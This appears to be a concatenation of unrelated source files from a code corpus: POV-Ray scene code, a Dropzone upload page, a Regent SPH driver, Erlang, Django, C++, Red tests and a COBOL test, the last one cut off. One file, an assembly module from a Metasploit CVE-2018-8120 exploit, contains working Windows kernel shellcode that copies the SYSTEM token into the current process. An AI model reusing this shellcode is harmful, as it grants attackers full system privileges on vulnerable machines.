<0.5-rand(rd),0.5-rand(rd),(0.5-rand(rd))*2>*20
#end
#macro RandX()
<(0.5-rand(rd))*2,(0.5-rand(rd))*8,(0.5-rand(rd))*2>*10
#end
#declare rd=seed(4610);
#declare Car= box{<-0.8,0,-2>,<0.8,1.6,2>}
// -----------------------------------------
// Foreground speeder
// -----------------------------------------
object{Cars[3] scale 1.5 rotate y*90 rotate x*-30 translate <384,202,-285> no_shadow}
// -----------------------------------------
// Car lines
// -----------------------------------------
#declare i=-200;
// lines extend on the x axis
union{
#while (i < 400)
#declare j=100;
#while (j<800)
object{Cars[int(nCars*rand(rd))] scale 2 rotate -y*90 rotate z*(0.5-rand(rd))*5 translate <i,j,-50>+RandX() no_shadow}
object{Cars[int(nCars*rand(rd))] scale 2 rotate y*90 rotate z*(0.5-rand(rd))*5 translate <i,j,-100>+RandX() no_shadow}
object{Cars[int(nCars*rand(rd))] scale 2 rotate -y*90 rotate z*(0.5-rand(rd))*5 translate <i,j,-150>+RandX() no_shadow}
object{Cars[int(nCars*rand(rd))] scale 2 rotate y*90 rotate z*(0.5-rand(rd))*5 translate <i,j,-200>+RandX() no_shadow}
object{Cars[int(nCars*rand(rd))] scale 2 rotate -y*90 rotate z*(0.5-rand(rd))*5 translate <i,j,-250>+RandX() no_shadow}
#declare j=j+100;
#end
#declare i=i+100;
#end
}
#end
// -----------------------------------------
// Placement bus
// -----------------------------------------
object{BusStraight scale 1.5 rotate y*180 translate <150,155,-250>}
object{BusStraight scale 1.5 rotate y*90 translate <320,265,-223>}
// -----------------------------------------
// Placement buildings
// -----------------------------------------
#if (BuildingsOK=1)
object{Build5 scale 1.5 scale <1,1,1> rotate y*0 translate -z*230-y*390+x*50}
object{Build7 rotate y*90 scale 1.4 translate -z*270-x*200+y*150}
object{Build3 scale 1.4 scale <4,1,-1> rotate y*90 translate -x*300+z*100-y*100}
object{Build5 scale 1.3 scale <4,1,1> rotate -y*90 translate -x*300-z*200-y*100}
object{Build5 scale 1.6 rotate y*90 translate -x*230-z*240-y*100}
object{Build4 scale 1.4 rotate y*90 translate -x*220-z*100}
object{Build4 scale 1.2 scale <-1,1,1> rotate y*0 translate -x*200-z*150-y*60}
object{Build3 scale 1.2 rotate y*-90 translate -x*180-z*100}
object{Build7 rotate -y*90 scale 1.4 translate -x*70+y*100}
object{Build7 scale 1.4} // main
object{Build7 rotate y*90 scale 1.4 translate x*70+y*50}
object{Build7 rotate -y*90 scale 1.4 translate x*100+y*50+z*250}
object{Build5 scale 1.4 translate x*140}
object{Build6 scale 1.6 translate x*230-y*100}
object{Build4 scale 1.4 rotate -y*180 translate x*260+z*100}
// bridge
object{Build3 scale 1.4 rotate y*0 scale <0.4,3,0.1> rotate x*90 rotate y*0 translate -x*150-z*225+y*155}
#end
// -----------------------------------------
// Ground plane
// -----------------------------------------
plane {y,-300 texture{pigment{P_Concrete03} finish{ambient 0 diffuse 0.1}}}
| POV-Ray SDL | 5 | SDRausty/TermuxPovray | scifi/scifi_demo.pov | [
"Apache-2.0"
] |
<html>
<head>
<title>DropzoneJS Uploader</title>
<!-- 1 -->
<link href="/public/css/dropzone.css" type="text/css" rel="stylesheet" />
<!-- 2 -->
<script src="/public/js/dropzone.js"></script>
<!-- 4 -->
<script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script>
<!-- 5 -->
<script>
Dropzone.options.myDropzone = {
paramName: "file", // The name that will be used to transfer the file
init: function () {
thisDropzone = this;
// 6
$.get('/uploads', function (data) {
if (data == null) {
return;
}
// 7
$.each(data, function (key, value) {
var mockFile = { name: value.name, size: value.size };
thisDropzone.emit("addedfile", mockFile);
thisDropzone.options.thumbnail.call(thisDropzone, mockFile, '/public/uploads/thumbnail_' + value.name);
// thisDropzone.createThumbnailFromUrl(mockFile, '/public/uploads/' + value.name); <- doesn't work...
// Make sure that there is no progress bar, etc...
thisDropzone.emit("complete", mockFile);
});
});
}
};
</script>
</head>
<body>
<!-- 3 -->
<form action="/upload" method="POST" class="dropzone" id="my-dropzone">
<div class="fallback">
<input name="file" type="file" multiple />
<input type="submit" value="Upload" />
</div>
</form>
</body>
</html> | HTML | 4 | tamsanh/examples | tutorial/dropzonejs/src/views/upload.html | [
"MIT"
] |
-------------------------------------------------------------
--Copyright 2020 Science and Technologies Facilities Council
--Licensed under the MIT License
--Author Aidan Chalk, STFC Hartree Centre
import "regent"
require("defaults")
require("src/interactions/MinimalSPH/interactions")
require("src/interactions/MinimalSPH/tasks")
require("src/interactions/MinimalSPH/hdf5_io")
require("src/interactions/MinimalSPH/timestep")
neighbour_init = require("src/neighbour_search/cell_pair_tradequeues/neighbour_init")
require("src/neighbour_search/cell_pair_tradequeues/neighbour_search")
local variables = require("src/interactions/MinimalSPH/variables")
local format = require("std/format")
local c = regentlib.c
local density_task = create_asymmetric_pairwise_runner( nonsym_density_kernel, variables.config, neighbour_init.cell_partition )
local force_task = create_symmetric_pairwise_runner( force_kernel, variables.config, neighbour_init.cell_partition )
local kick2_task = run_per_particle_task( kick2_kernel, variables.config, neighbour_init.cell_partition )
local kick1_task = run_per_particle_task( kick1_kernel, variables.config, neighbour_init.cell_partition )
local drift_task = run_per_particle_task( drift_kernel, variables.config, neighbour_init.cell_partition )
local reset_density_task = run_per_particle_task( reset_density, variables.config, neighbour_init.cell_partition )
local reset_force_task = run_per_particle_task( reset_acceleration, variables.config, neighbour_init.cell_partition )
local initial_density_reset = run_per_particle_task( reset_density, variables.config, neighbour_init.cell_partition )
local initial_force_reset = run_per_particle_task( reset_density, variables.config, neighbour_init.cell_partition )
local initial_density_task = create_asymmetric_pairwise_runner( nonsym_density_kernel, variables.config, neighbour_init.cell_partition )
local initial_timestep_task = run_per_particle_task( kick1_kernel, variables.config, neighbour_init.cell_partition )
local fname = os.getenv("SODSHOCK_INPUT") or "/home/aidan/swiftsim/examples/HydroTests/SodShock_3D/sodShock.hdf5"
print(fname)
__forbid(__inline)
task say_hello(time : float)
format.println("HELLO TIME {}", time)
end
task get_time() : double
return c.legion_get_current_time_in_micros()
end
task main()
--[initialisation("/home/aidan/swiftsim/examples/HydroTests/SodShock_3D/sodShock.hdf5", variables.particle_array, variables.space)]
var filename = fname
var count = read_particle_count(filename)
format.println("Initialising SPH from {} with {} hydro particles", filename, count)
var particles_space = ispace(int1d, count)
var [variables.particle_array] = region(particles_space, part)
var [variables.config] = region(ispace(int1d, 1), config_type)
fill([variables.config].{space.dim_x, space.dim_y, space.dim_z, space.timestep}, 0.0)
read_hdf5_snapshot(filename, count, [variables.particle_array], [variables.config])
format.println("{} {} {}", [variables.config][0].space.dim_x, [variables.config][0].space.dim_y, [variables.config][0].space.dim_z);
--Make 5x5x5 cells for now (chosen arbitrarily). NB This wouldn't not be sensible for optimised version, but the neighbour search will
--be involved in cell size choices for real cases
[neighbour_init.initialise(variables)];
[neighbour_init.update_cells(variables)];
--Initialisation
[initial_density_reset];
-- [run_per_particle_task( reset_density, variables.config, variables.cell_space )];
[initial_force_reset];
--Do the zero timestep to setup the IC
variables.config[0].space.timestep = 0.00
[initial_density_task];
update_cutoffs_launcher(neighbour_init.padded_particle_array, neighbour_init.cell_partition, variables.config);
[initial_timestep_task];
variables.config[0].space.timestep = compute_timestep_launcher(neighbour_init.padded_particle_array, neighbour_init.cell_partition, variables.config)
var time : double = 0.0
var endtime : double = 0.02
var step : int = 0
c.legion_runtime_issue_execution_fence(__runtime(), __context())
var start_time = get_time()
format.println("timestep computed is {}", variables.config[0].space.timestep)
c.legion_runtime_issue_execution_fence(__runtime(), __context())
-- __delete(variables.cell_space)
while time < endtime do
[drift_task];
-- [neighbour_init.update_cells(variables)];
[reset_density_task];
[density_task];
update_cutoffs_launcher(neighbour_init.padded_particle_array, neighbour_init.cell_partition, variables.config);
[reset_force_task];
[force_task];
--2nd kick
[kick2_task];
-- timestep_task([variables.particle_array], cell_partition, [variables.space])
c.legion_runtime_issue_execution_fence(__runtime(), __context());
say_hello(time)
time = time + variables.config[0].space.timestep
variables.config[0].space.timestep = compute_timestep_launcher(neighbour_init.padded_particle_array, neighbour_init.cell_partition, variables.config)
if(endtime - time < variables.config[0].space.timestep) then
variables.config[0].space.timestep = endtime - time
end
--first kick
[kick1_task];
format.println("Step {}: timestep is {}",step, variables.config[0].space.timestep)
step = step + 1
end
c.legion_runtime_issue_execution_fence(__runtime(), __context())
var end_time = get_time()
format.println("Computation took {} seconds.", (end_time - start_time)/1000000.0)
write_hdf5_snapshot("output.hdf5", neighbour_init.padded_particle_array, variables.config)
end
regentlib.start(main)
| Rouge | 5 | stfc/RegentParticleDSL | src/interactions/MinimalSPH/program.rg | [
"MIT"
] |
-module(para2_adt).
%% More parameterized opaque types
-export_type([c1/0, c2/0]).
-export_type([ct1/0, ct2/0]).
-export_type([circ/1, circ/2]).
-export_type([un/2]).
-export([c1/0, c2/0, ct1/0, ct2/0, circ1/0, circ2/0, u1/0, u2/0]).
-opaque c1() :: c2().
-opaque c2() :: c1().
-spec c1() -> c1().
c1() ->
a.
-spec c2() -> c2().
c2() ->
a.
-type ct1() :: ct2().
-type ct2() :: ct1().
-spec ct1() -> ct1().
ct1() ->
a.
-spec ct2() -> ct2().
ct2() ->
b.
-opaque circ(A) :: circ(A, A).
-opaque circ(A, B) :: circ({A, B}).
-spec circ1() -> circ(integer()).
circ1() ->
3.
-spec circ2() -> circ(integer(), integer()).
circ2() ->
{3, 3}.
-opaque un(A, B) :: A | B.
-spec u1() -> un(integer(), atom()).
u1() ->
3.
-spec u2() -> un(atom(), integer()).
u2() ->
3.
| Erlang | 4 | jjhoo/otp | lib/dialyzer/test/opaque_SUITE_data/src/para/para2_adt.erl | [
"Apache-2.0"
] |
"""
Test URLs for auth admins.
"""
from django.contrib import admin
from django.contrib.auth.admin import GroupAdmin, UserAdmin
from django.contrib.auth.models import Group, User
from django.contrib.auth.urls import urlpatterns
from django.urls import path
# Create a silo'd admin site for just the user/group admins.
site = admin.AdminSite(name='auth_test_admin')
site.register(User, UserAdmin)
site.register(Group, GroupAdmin)
urlpatterns += [
path('admin/', site.urls),
]
| Python | 4 | ni-ning/django | tests/auth_tests/urls_admin.py | [
"CNRI-Python-GPL-Compatible",
"BSD-3-Clause"
] |
/*++
Copyright (c) Microsoft Corporation
Licensed under the MIT license.
Module Name:
- DbcsAttribute.hpp
Abstract:
- helper class for storing double byte character set information about a cell in the output buffer.
Author(s):
- Austin Diviness (AustDi) 26-Jan-2018
Revision History:
--*/
#pragma once
class DbcsAttribute final
{
public:
enum class Attribute : BYTE
{
Single = 0x00,
Leading = 0x01,
Trailing = 0x02
};
DbcsAttribute() noexcept :
_attribute{ Attribute::Single },
_glyphStored{ false }
{
}
DbcsAttribute(const Attribute attribute) noexcept :
_attribute{ attribute },
_glyphStored{ false }
{
}
constexpr bool IsSingle() const noexcept
{
return _attribute == Attribute::Single;
}
constexpr bool IsLeading() const noexcept
{
return _attribute == Attribute::Leading;
}
constexpr bool IsTrailing() const noexcept
{
return _attribute == Attribute::Trailing;
}
constexpr bool IsDbcs() const noexcept
{
return IsLeading() || IsTrailing();
}
constexpr bool IsGlyphStored() const noexcept
{
return _glyphStored;
}
void SetGlyphStored(const bool stored) noexcept
{
_glyphStored = stored;
}
void SetSingle() noexcept
{
_attribute = Attribute::Single;
}
void SetLeading() noexcept
{
_attribute = Attribute::Leading;
}
void SetTrailing() noexcept
{
_attribute = Attribute::Trailing;
}
void Reset() noexcept
{
SetSingle();
SetGlyphStored(false);
}
WORD GeneratePublicApiAttributeFormat() const noexcept
{
WORD publicAttribute = 0;
if (IsLeading())
{
WI_SetFlag(publicAttribute, COMMON_LVB_LEADING_BYTE);
}
if (IsTrailing())
{
WI_SetFlag(publicAttribute, COMMON_LVB_TRAILING_BYTE);
}
return publicAttribute;
}
static DbcsAttribute FromPublicApiAttributeFormat(WORD publicAttribute)
{
// it's not valid to be both a leading and trailing byte
if (WI_AreAllFlagsSet(publicAttribute, COMMON_LVB_LEADING_BYTE | COMMON_LVB_TRAILING_BYTE))
{
THROW_HR(E_INVALIDARG);
}
DbcsAttribute attr;
if (WI_IsFlagSet(publicAttribute, COMMON_LVB_LEADING_BYTE))
{
attr.SetLeading();
}
else if (WI_IsFlagSet(publicAttribute, COMMON_LVB_TRAILING_BYTE))
{
attr.SetTrailing();
}
return attr;
}
friend constexpr bool operator==(const DbcsAttribute& a, const DbcsAttribute& b) noexcept;
private:
Attribute _attribute : 2;
bool _glyphStored : 1;
#ifdef UNIT_TESTING
friend class TextBufferTests;
#endif
};
constexpr bool operator==(const DbcsAttribute& a, const DbcsAttribute& b) noexcept
{
return a._attribute == b._attribute;
}
static_assert(sizeof(DbcsAttribute) == sizeof(BYTE), "DbcsAttribute should be one byte big. if this changes then it needs "
"either an implicit conversion to a BYTE or an update to all places "
"that assume it's a byte big");
| C++ | 5 | hessedoneen/terminal | src/buffer/out/DbcsAttribute.hpp | [
"MIT"
] |
Red [
Title: "Red case function test script"
Author: "Nenad Rakocevic & Peter W A Wood"
File: %case-test.red
Tabs: 4
Rights: "Copyright (C) 2011-2015, Red Foundation. All rights reserved."
License: "BSD-3 - https://github.com/red/red/blob/origin/BSD-3-License.txt"
]
#include %../../../quick-test/quick-test.red
~~~start-file~~~ "case"
===start-group=== "case basics"
--test-- "case-basic-1"
ci: 0
cia: 1
case [true [0]]
--assert cia = 1
--test-- "case-basic-2"
ci: 1
cia: 2
case [ci = 1 [cia: 2]]
--assert cia = 2
--test-- "case-basic-3"
ci: 1
cia: 2
case [true [cia: 3]]
--assert cia = 3
--test-- "case-basic-4"
ci: 0
cia: 2
case [ci <> 0 [cia: 0] true [cia: 3]]
--assert cia = 3
--test-- "case-basic-5"
ci: 99
cia: 2
case [ci = 1 [cia: 2] true [cia: 3]]
--assert cia = 3
--test-- "case-basic-6"
ci: 0
cia: 1
cia: case [true [2]]
--assert cia = 2
--test-- "case-basic-7"
ci: 0
cia: 2
cia: case [ci <> 0 [0] true [3]]
--assert cia = 3
--test-- "case-basic-8"
ci: 1
cia: 2
cia: case [ci = 1 [3]]
--assert cia = 3
--test-- "case-basic-9"
ci: 1
cia: 2
case [ci = 1 [case [ci <> 0 [cia: 3] true [cia: 4]]]]
--assert cia = 3
--test-- "case-basic-10"
ci: 1
cia: 2
cia: case [ci = 1 [case [ci <> 0 [3] true [4]]]]
--assert cia = 3
--test-- "case-basic-11"
ci: 1
cia: 2
cia: case [ci = 1 [switch/default ci [1 [3]][4]]]
--assert cia = 3
===end-group===
===start-group=== "case basics local"
case-fun: func [/local ci cia][
--test-- "case-loc-1"
ci: 0
cia: 1
case [true [0]]
--assert cia = 1
--test-- "case-loc-2"
ci: 1
cia: 2
case [ci = 1 [cia: 2]]
--assert cia = 2
--test-- "case-loc-3"
ci: 1
cia: 2
case [true [cia: 3]]
--assert cia = 3
--test-- "case-loc-4"
ci: 0
cia: 2
case [ci <> 0 [cia: 0] true [cia: 3]]
--assert cia = 3
--test-- "case-loc-5"
ci: 99
cia: 2
case [ci = 1 [cia: 2] true [cia: 3]]
--assert cia = 3
--test-- "case-loc-6"
ci: 0
cia: 1
cia: case [true [2]]
--assert cia = 2
--test-- "case-loc-7"
ci: 0
cia: 2
cia: case [ci <> 0 [0] true [3]]
--assert cia = 3
--test-- "case-loc-8"
ci: 1
cia: 2
cia: case [ci = 1 [3]]
--assert cia = 3
--test-- "case-loc-9"
ci: 1
cia: 2
case [ci = 1 [case [ci <> 0 [cia: 3] true [cia: 4]]]]
--assert cia = 3
--test-- "case-loc-10"
ci: 1
cia: 2
cia: case [ci = 1 [case [ci <> 0 [3] true [4]]]]
--assert cia = 3
--test-- "case-loc-11"
ci: 1
cia: 2
cia: case [ci = 1 [switch/default ci [1 [3]][4]]]
--assert cia = 3
]
case-fun
===end-group===
===start-group=== "case integer!"
--test-- "case-int-1"
ci: 1
cia: 0
case [ ci = 1 [cia: 1] ci = 2 [cia: 2] true [cia: 3]]
--assert 1 = cia
--test-- "case-int-2"
ci: 2
cia: 0
case [ ci = 1 [cia: 1] ci = 2 [cia: 2] true [cia: 3]]
--assert 2 = cia
--test-- "case-int-3"
ci: 3
cia: 0
case [ ci = 1 [cia: 1] ci = 2 [cia: 2] true [cia: 3]]
--assert 3 = cia
--test-- "case-int-4"
ci: 9
cia: 0
case [ ci = 1 [cia: 1] ci = 2 [cia: 2] true [cia: 3]]
--assert 3 = cia
--test-- "case-int-5"
ci: 1
--assert 1 = case [ ci = 1 [1] ci = 2 [2] true [3]]
--test-- "case-int-6"
ci: 1
cres: case [ ci = 1 [1] ci = 2 [2] true [3]]
--assert 1 = cres
--test-- "case-int-7"
ci: 2
--assert 2 = case [ ci = 1 [1] ci = 2 [2] true [3]]
--test-- "case-int-8"
ci: 2
cres: case [ ci = 1 [1] ci = 2 [2] true [3]]
--assert 2 = cres
--test-- "case-int-9"
ci: 3
--assert 3 = case [ ci = 1 [1] ci = 2 [2] true [3]]
--test-- "case-int-10"
ci: 3
cres: case [ ci = 1 [1] ci = 2 [2] true [3]]
--assert 3 = cres
--test-- "case-int-11"
ci: 10
--assert 3 = case [ ci = 1 [1] ci = 2 [2] true [3]]
--test-- "case-int-12"
ci: 10
cres: case [ ci = 1 [1] ci = 2 [2] true [3]]
--assert 3 = cres
case [ ci = 1 [cia: 1] ci = 2 [cia: 2] true [cia: 3]]
--test-- "case-int-13"
ci: 1
cia: 0
--assert 1 = case [ ci = 1 [cia: 1] ci = 2 [cia: 2] true [cia: 3]]
--test-- "case-int-14"
ci: 1
cia: 0
cres: case [ ci = 1 [cia: 1] ci = 2 [cia: 2] true [cia: 3]]
--assert 1 = cres
--test-- "case-int-15"
ci: 2
cia: 0
--assert 2 = case [ ci = 1 [cia: 1] ci = 2 [cia: 2] true [cia: 3]]
--test-- "case-int-16"
ci: 2
cia: 0
cres: case [ ci = 1 [cia: 1] ci = 2 [cia: 2] true [cia: 3]]
--assert 2 = cres
--test-- "case-int-17"
ci: 3
cia: 0
--assert 3 = case [ ci = 1 [cia: 1] ci = 2 [cia: 2] true [cia: 3]]
--test-- "case-int-18"
ci: 3
cia: 0
cres: case [ ci = 1 [cia: 1] ci = 2 [cia: 2] true [cia: 3]]
--assert 3 = cres
--test-- "case-int-19"
ci: 9
cia: 0
--assert 3 = case [ ci = 1 [cia: 1] ci = 2 [cia: 2] true [cia: 3]]
--test-- "case-int-20"
ci: 9
cia: 0
cres: case [ ci = 1 [cia: 1] ci = 2 [cia: 2] true [cia: 3]]
--assert 3 = cres
===end-group===
===start-group=== "case logic!"
--test-- "case-logic-1"
cl: true
--assert case [ cl = true [true] cl = false [false] true [false]]
--test-- "case-logic-2"
cl: false
--assert false = case [ cl = true [true] cl = false [false] true [true]]
===end-group===
===start-group=== "case reported issues"
--test-- "case-issue-504"
--assert 1 = case [true 1 false 2]
===end-group===
~~~end-file~~~
| Red | 4 | 0xflotus/red | tests/source/units/case-test.red | [
"BSL-1.0",
"BSD-3-Clause"
] |
public shellcode08
public shellcode7
public shellcode03
public NtUserSetImeInfoEx
_TEXT SEGMENT
NtUserSetImeInfoEx PROC
mov r10,rcx;
mov eax,4871;
syscall;
ret;
NtUserSetImeInfoEx ENDP
shellcode08 PROC
mov rax, gs:[392];// Get nt!_KPCR.PcrbData.CurrentThread
mov rax, [rax + 104];// Get nt!_KTHREAD.ApcState.Process
mov rcx, rax;// Copy current _EPROCESS structure
mov rdx, 4;// WIN 7 SP1 SYSTEM Process PID = 0x4
mov rdi, 232;
SearchSystemPID:
mov rax, [rax + rdi];// Get nt!_EPROCESS.ActiveProcessLinks.Flink
sub rax, rdi;
cmp [rax + 224], rdx;// Get nt!_EPROCESS.UniqueProcessId
jne SearchSystemPID
mov rdx, [rax + 360];// Get SYSTEM process nt!_EPROCESS.Token
mov [rcx + 360], rdx;// Copy nt!_EPROCESS.Token of SYSTEM to current process
xor rax, rax;// Set NTSTATUS SUCCEESS
ret;
shellcode08 ENDP
shellcode7 PROC
mov rax, gs:[392];// Get nt!_KPCR.PcrbData.CurrentThread
mov rax, [rax + 112];// Get nt!_KTHREAD.ApcState.Process
mov rcx, rax;// Copy current _EPROCESS structure
mov rdx, 4;// WIN 7 SP1 SYSTEM Process PID = 0x4
mov rdi, 392;
SearchSystemPID:
mov rax, [rax + rdi];// Get nt!_EPROCESS.ActiveProcessLinks.Flink
sub rax, rdi;
cmp [rax + 384], rdx;// Get nt!_EPROCESS.UniqueProcessId
jne SearchSystemPID
mov rdx, [rax + 520];// Get SYSTEM process nt!_EPROCESS.Token
mov [rcx + 520], rdx;// Copy nt!_EPROCESS.Token of SYSTEM to current process
xor rax, rax;// Set NTSTATUS SUCCEESS
ret;
shellcode7 ENDP
shellcode03 PROC
mov rax, gs:[392];// Get nt!_KPCR.PcrbData.CurrentThread
mov rax, [rax + 104];// Get nt!_KTHREAD.ApcState.Process
mov rcx, rax;// Copy current _EPROCESS structure
mov rdx, 4;// SYSTEM Process PID = 0x4
mov rdi, 224;// Get nt!_EPROCESS.ActiveProcessLinks.Flink
SearchSystemPID:
mov rax, [rax + rdi];
sub rax, rdi;
cmp [rax + 216], rdx;// Get nt!_EPROCESS.UniqueProcessId
jne SearchSystemPID
mov rdx, [rax + 352];// Get SYSTEM process nt!_EPROCESS.Token
mov [rcx + 352], rdx;// Copy nt!_EPROCESS.Token of SYSTEM to current process
xor rax, rax;// Set NTSTATUS SUCCEESS
ret;
shellcode03 ENDP
_TEXT ENDS
END | Assembly | 3 | OsmanDere/metasploit-framework | external/source/exploits/CVE-2018-8120/CVE-2018-8120/shellcode.asm | [
"BSD-2-Clause",
"BSD-3-Clause"
] |
Mozilla/5.0 (Linux; Android 5.0; LG-X170g Build/LRX21M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.83 Mobile Safari/537.36
Mozilla/5.0 (Linux; Android 5.0; LG-X170g Build/LRX21M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Mobile Safari/537.36
| Text | 0 | 5tr1x/SecLists | Fuzzing/User-Agents/operating-platform/lg-x170g.txt | [
"MIT"
] |
t ia2 -dzoom 0 1 400
| AGS Script | 0 | waltersgrey/autoexechack | photofov/NarrowFOV/autoexec.ash | [
"MIT"
] |
#include "caffe2/operators/async_net_barrier_op.h"
namespace caffe2 {
namespace {
std::pair<std::vector<DeviceOption>, std::vector<DeviceOption>>
asyncBarrierOpDevInfer(const OperatorDef& def) {
auto op_device =
def.has_device_option() ? def.device_option() : DeviceOption();
ArgumentHelper helper(def);
auto cross_device = helper.GetSingleArgument<int>("cross_device", 0);
std::vector<DeviceOption> opt;
for (int i = 0; i < def.input().size(); ++i) {
if (cross_device == 1) {
DeviceOption dev;
dev.set_device_type(op_device.device_type());
dev.set_device_id(i);
opt.push_back(dev);
} else {
opt.push_back(op_device);
}
}
return std::make_pair(opt, opt);
}
}
OPERATOR_SCHEMA(AsyncNetBarrier)
.NumInputs(1, INT_MAX)
.NumOutputs(1, INT_MAX)
.IdenticalTypeAndShape()
.InputsCanCrossDevices()
.AllowOneToOneInplace()
.DeviceInferenceFunction(asyncBarrierOpDevInfer)
.SetDoc(R"DOC(
This is a pretty much no-op operator, since it's only purposes is make sure that
async_scheduling will schedule certian operations earlier than others.
Exaple where this operator can work well - mixture of data-parallel and model-
parallel training, where one wants to force that all copies are started before
data-parallel part starts.
)DOC")
.Arg(
"cross_device",
"Specifies either inputs should be across different devices in dev inference options");
SHOULD_NOT_DO_GRADIENT(AsyncNetBarrier);
REGISTER_CPU_OPERATOR(AsyncNetBarrier, AsyncNetBarrierOp<CPUContext>);
} // namespace caffe2
| C++ | 4 | Hacky-DH/pytorch | caffe2/operators/async_net_barrier_op.cc | [
"Intel"
] |
*> This file is part of GnuCOBOL.
*>
*> The GnuCOBOL compiler is free software: you can redistribute
*> it and/or modify it under the terms of the GNU General Public
*> License as published by the Free Software Foundation, either
*> version 3 of the License, or (at your option) any later
*> version.
*>
*> GnuCOBOL is distributed in the hope that it will be useful,
*> but WITHOUT ANY WARRANTY; without even the implied warranty of
*> MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
*> GNU General Public License for more details.
*>
*> You should have received a copy of the GNU General Public
*> License along with GnuCOBOL.
*> If not, see <http://www.gnu.org/licenses/>.
IDENTIFICATION DIVISION.
PROGRAM-ID. prog.
DATA DIVISION.
WORKING-STORAGE SECTION.
01 G-1.
02 X-1 PIC 9(1) VALUE 1
@USAGE@.
02 FILLER PIC X(18) VALUE SPACE.
01 G-2.
02 X-2 PIC 9(2) VALUE 12
@USAGE@.
02 FILLER PIC X(18) VALUE SPACE.
01 G-3.
02 X-3 PIC 9(3) VALUE 123
@USAGE@.
02 FILLER PIC X(18) VALUE SPACE.
01 G-4.
02 X-4 PIC 9(4) VALUE 1234
@USAGE@.
02 FILLER PIC X(18) VALUE SPACE.
01 G-5.
02 X-5 PIC 9(5) VALUE 12345
@USAGE@.
02 FILLER PIC X(18) VALUE SPACE.
01 G-6.
02 X-6 PIC 9(6) VALUE 123456
@USAGE@.
02 FILLER PIC X(18) VALUE SPACE.
01 G-7.
02 X-7 PIC 9(7) VALUE 1234567
@USAGE@.
02 FILLER PIC X(18) VALUE SPACE.
01 G-8.
02 X-8 PIC 9(8) VALUE 12345678
@USAGE@.
02 FILLER PIC X(18) VALUE SPACE.
01 G-9.
02 X-9 PIC 9(9) VALUE 123456789
@USAGE@.
02 FILLER PIC X(18) VALUE SPACE.
01 G-10.
02 X-10 PIC 9(10) VALUE 1234567890
@USAGE@.
02 FILLER PIC X(18) VALUE SPACE.
01 G-11.
02 X-11 PIC 9(11) VALUE 12345678901
@USAGE@.
02 FILLER PIC X(18) VALUE SPACE.
01 G-12.
02 X-12 PIC 9(12) VALUE 123456789012
@USAGE@.
02 FILLER PIC X(18) VALUE SPACE.
01 G-13.
02 X-13 PIC 9(13) VALUE 1234567890123
@USAGE@.
02 FILLER PIC X(18) VALUE SPACE.
01 G-14.
02 X-14 PIC 9(14) VALUE 12345678901234
@USAGE@.
02 FILLER PIC X(18) VALUE SPACE.
01 G-15.
02 X-15 PIC 9(15) VALUE 123456789012345
@USAGE@.
02 FILLER PIC X(18) VALUE SPACE.
01 G-16.
02 X-16 PIC 9(16) VALUE 1234567890123456
@USAGE@.
02 FILLER PIC X(18) VALUE SPACE.
01 G-17.
02 X-17 PIC 9(17) VALUE 12345678901234567
@USAGE@.
02 FILLER PIC X(18) VALUE SPACE.
01 G-18.
02 X-18 PIC 9(18) VALUE 123456789012345678
@USAGE@.
02 FILLER PIC X(18) VALUE SPACE.
01 G-S1.
02 X-S1 PIC S9(1) VALUE -1
@USAGE@.
02 FILLER PIC X(18) VALUE SPACE.
01 G-S2.
02 X-S2 PIC S9(2) VALUE -12
@USAGE@.
02 FILLER PIC X(18) VALUE SPACE.
01 G-S3.
02 X-S3 PIC S9(3) VALUE -123
@USAGE@.
02 FILLER PIC X(18) VALUE SPACE.
01 G-S4.
02 X-S4 PIC S9(4) VALUE -1234
@USAGE@.
02 FILLER PIC X(18) VALUE SPACE.
01 G-S5.
02 X-S5 PIC S9(5) VALUE -12345
@USAGE@.
02 FILLER PIC X(18) VALUE SPACE.
01 G-S6.
02 X-S6 PIC S9(6) VALUE -123456
@USAGE@.
02 FILLER PIC X(18) VALUE SPACE.
01 G-S7.
02 X-S7 PIC S9(7) VALUE -1234567
@USAGE@.
02 FILLER PIC X(18) VALUE SPACE.
01 G-S8.
02 X-S8 PIC S9(8) VALUE -12345678
@USAGE@.
02 FILLER PIC X(18) VALUE SPACE.
01 G-S9.
02 X-S9 PIC S9(9) VALUE -123456789
@USAGE@.
02 FILLER PIC X(18) VALUE SPACE.
01 G-S10.
02 X-S10 PIC S9(10) VALUE -1234567890
@USAGE@.
02 FILLER PIC X(18) VALUE SPACE.
01 G-S11.
02 X-S11 PIC S9(11) VALUE -12345678901
@USAGE@.
02 FILLER PIC X(18) VALUE SPACE.
01 G-S12.
02 X-S12 PIC S9(12) VALUE -123456789012
@USAGE@.
02 FILLER PIC X(18) VALUE SPACE.
01 G-S13.
02 X-S13 PIC S9(13) VALUE -1234567890123
@USAGE@.
02 FILLER PIC X(18) VALUE SPACE.
01 G-S14.
02 X-S14 PIC S9(14) VALUE -12345678901234
@USAGE@.
02 FILLER PIC X(18) VALUE SPACE.
01 G-S15.
02 X-S15 PIC S9(15) VALUE -123456789012345
@USAGE@.
02 FILLER PIC X(18) VALUE SPACE.
01 G-S16.
02 X-S16 PIC S9(16) VALUE -1234567890123456
@USAGE@.
02 FILLER PIC X(18) VALUE SPACE.
01 G-S17.
02 X-S17 PIC S9(17) VALUE -12345678901234567
@USAGE@.
02 FILLER PIC X(18) VALUE SPACE.
01 G-S18.
02 X-S18 PIC S9(18) VALUE -123456789012345678
@USAGE@.
02 FILLER PIC X(18) VALUE SPACE.
PROCEDURE DIVISION.
*> Dump all values
CALL "dump" USING G-1
END-CALL.
CALL "dump" USING G-2
END-CALL.
CALL "dump" USING G-3
END-CALL.
CALL "dump" USING G-4
END-CALL.
CALL "dump" USING G-5
END-CALL.
CALL "dump" USING G-6
END-CALL.
CALL "dump" USING G-7
END-CALL.
CALL "dump" USING G-8
END-CALL.
CALL "dump" USING G-9
END-CALL.
CALL "dump" USING G-10
END-CALL.
CALL "dump" USING G-11
END-CALL.
CALL "dump" USING G-12
END-CALL.
CALL "dump" USING G-13
END-CALL.
CALL "dump" USING G-14
END-CALL.
CALL "dump" USING G-15
END-CALL.
CALL "dump" USING G-16
END-CALL.
CALL "dump" USING G-17
END-CALL.
CALL "dump" USING G-18
END-CALL.
CALL "dump" USING G-S1
END-CALL.
CALL "dump" USING G-S2
END-CALL.
CALL "dump" USING G-S3
END-CALL.
